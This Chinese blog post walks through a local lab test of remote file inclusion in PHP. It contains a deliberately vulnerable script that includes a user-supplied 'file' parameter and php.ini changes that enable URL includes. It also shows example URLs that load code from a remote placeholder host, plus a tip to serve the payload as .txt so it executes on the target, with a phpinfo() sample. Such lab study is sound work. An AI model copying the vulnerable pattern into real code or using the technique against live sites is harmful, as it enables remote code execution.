您的位置:首页 > 其它

远程文件包含漏洞测试

2013-09-16 17:15 423 查看
在本地搭建test.php

<?php

if( !ini_get('display_errors') ) {

  ini_set('display_errors', 'On');

  }

error_reporting(E_ALL);

$f = $_GET["file"];

if ($f){

//require "".$f.".php";

include "".$f;

}else{

print("No File Included");

}

?>

---------------------------------
http://xxx.com/test.php?file=123     本地的成功
http://xxx.com/test.php?file=http://xxx.com/123            
远程的不成功

---------------------------------

打开php.ini文件的:

allow_url_fopen = On

allow_url_include = On

---------------------------------
http://xxx.com/test.php?file=http://xxx.com/123            
远程的成功

-----------------------------------------------------------------------------------------------------------------------------------------------------------

注:在使用远程文件包含时,攻击代码必需为.txt后缀

如远程空间为:

phpinfo.php          --->包含后的信息为远程服务器的phpinfo信息

phpinfo.txt
     --->包含后才是漏洞服务器的phpinfo信息

内容同为:

<?php

phpinfo();

?>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  rfi 远程文件包含漏洞
相关文章推荐
新的分享
章节导航